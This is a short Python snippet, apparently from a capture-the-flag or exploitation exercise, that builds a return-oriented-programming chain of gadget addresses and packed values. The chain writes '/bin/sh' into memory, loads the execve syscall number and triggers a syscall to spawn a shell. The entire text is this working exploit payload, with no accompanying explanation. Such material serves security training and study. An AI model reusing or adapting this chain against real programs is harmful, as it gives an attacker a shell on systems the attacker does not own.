payload = p64(0x413f7b)
#0x413f7b: pop rdx ; retf
payload += p64(0x68662f6e69622f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x431070)+p64(0x4238ae)
# 0x4238ae: xchg edi, eax ; retf
payload += p32(0x41058c)+p32(0x33)
# 0x000000000041058c: mov qword ptr [rax], rdx; pop rbp; ret; 
payload += p64(0x0)+p64(0x413f7b)
# 0x413f7b: pop rdx ; retf
payload += p64(0x0)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x4238ae)
# 0x4238ae: xchg edi, eax ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x431070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4214c2)
# 0x00000000004214c2: syscall; 
payload += b''
